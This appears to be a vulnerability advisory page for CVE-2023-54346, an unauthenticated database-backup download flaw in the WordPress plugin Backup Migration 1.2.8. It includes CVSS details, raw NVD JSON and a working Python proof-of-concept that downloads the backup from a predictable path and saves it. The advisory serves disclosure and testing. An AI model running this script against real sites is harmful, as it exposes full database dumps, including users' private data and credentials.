Security Vulnerability Report
CVE-2023-54346 CVSS 7.5 HIGH

CVE-2023-54346

Published: 2026-05-05 12:16:17
Last Modified: 2026-05-05 19:47:57

Description

WordPress Plugin Backup Migration 1.2.8 contains an information disclosure vulnerability that allows unauthenticated attackers to download complete database backups by accessing predictable file paths. Attackers can enumerate backup directories through configuration files and complete logs, then construct direct download URLs to retrieve sensitive backup archives containing full database dumps.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Backup Migration <= 1.2.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2023-54346 proof of concept.
#
# Demonstrates the exposure described in the advisory: the plugin keeps its
# database backup under a predictable, web-served path, so a single
# unauthenticated GET is enough to retrieve it. Run it only against a site you
# own or are authorized to assess, e.g. to confirm that the file is no longer
# directly reachable after remediation.

# Path the plugin uses for the backup, relative to the site root. The exact
# filename may differ per installation; the advisory notes it can be learned
# from the plugin's own configuration files and logs.
BACKUP_RELATIVE_PATH = "/wp-content/plugins/backup-backup/backups/backup_database.sql"

# Where a successfully fetched backup is written (current working directory).
OUTPUT_FILE = "dumped_backup.sql"


def _write_dump(payload):
    """Write *payload* (raw bytes) to OUTPUT_FILE, overwriting any existing file."""
    with open(OUTPUT_FILE, "wb") as out:
        out.write(payload)


def check_vulnerability(target_url):
    """Request the plugin's backup file from *target_url* and report the outcome.

    Args:
        target_url: Base URL of the WordPress site, including the scheme
            (e.g. ``http://...``); the backup path is appended verbatim.

    Side effects:
        Prints progress to stdout. An HTTP 200 is treated as a hit: the
        response body is saved unmodified to ``dumped_backup.sql``. Any other
        status is reported as a failure, and transport-level errors from
        ``requests`` are printed rather than raised.
    """
    backup_url = f"{target_url}{BACKUP_RELATIVE_PATH}"
    print(f"[+] Checking target: {target_url}")
    print(f"[+] Attempting to download: {backup_url}")

    try:
        # Bounded timeout so an unresponsive host does not hang the check.
        response = requests.get(backup_url, timeout=10)
    except requests.exceptions.RequestException as exc:
        print(f"[-] Error: {exc}")
        return

    if response.status_code != 200:
        print(f"[-] Failed. HTTP Status Code: {response.status_code}")
        return

    # NOTE(review): a 200 only proves the URL is served without authentication;
    # the body is not inspected, so it is saved as-is for the operator to verify.
    payload = response.content
    print("[!] SUCCESS: Backup file downloaded!")
    print(f"[!] File size: {len(payload)} bytes")
    _write_dump(payload)
    print("[!] Saved as 'dumped_backup.sql'")


def main(argv):
    """CLI entry point: expects exactly one argument, the target base URL."""
    if len(argv) != 2:
        print("Usage: python3 poc.py <http://target_url>")
        return
    check_vulnerability(argv[1])


if __name__ == "__main__":
    main(sys.argv)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-54346", "sourceIdentifier": "[email protected]", "published": "2026-05-05T12:16:17.020", "lastModified": "2026-05-05T19:47:57.367", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "WordPress Plugin Backup Migration 1.2.8 contains an information disclosure vulnerability that allows unauthenticated attackers to download complete database backups by accessing predictable file paths. Attackers can enumerate backup directories through configuration files and complete logs, then construct direct download URLs to retrieve sensitive backup archives containing full database dumps."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-538"}]}], "references": [{"url": "https://backupbliss.com/", "source": "[email protected]"}, {"url": "https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/51445", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/wordpress-plugin-backup-migration-unauthenticated-database-backup-download", "source": "[email protected]"}]}}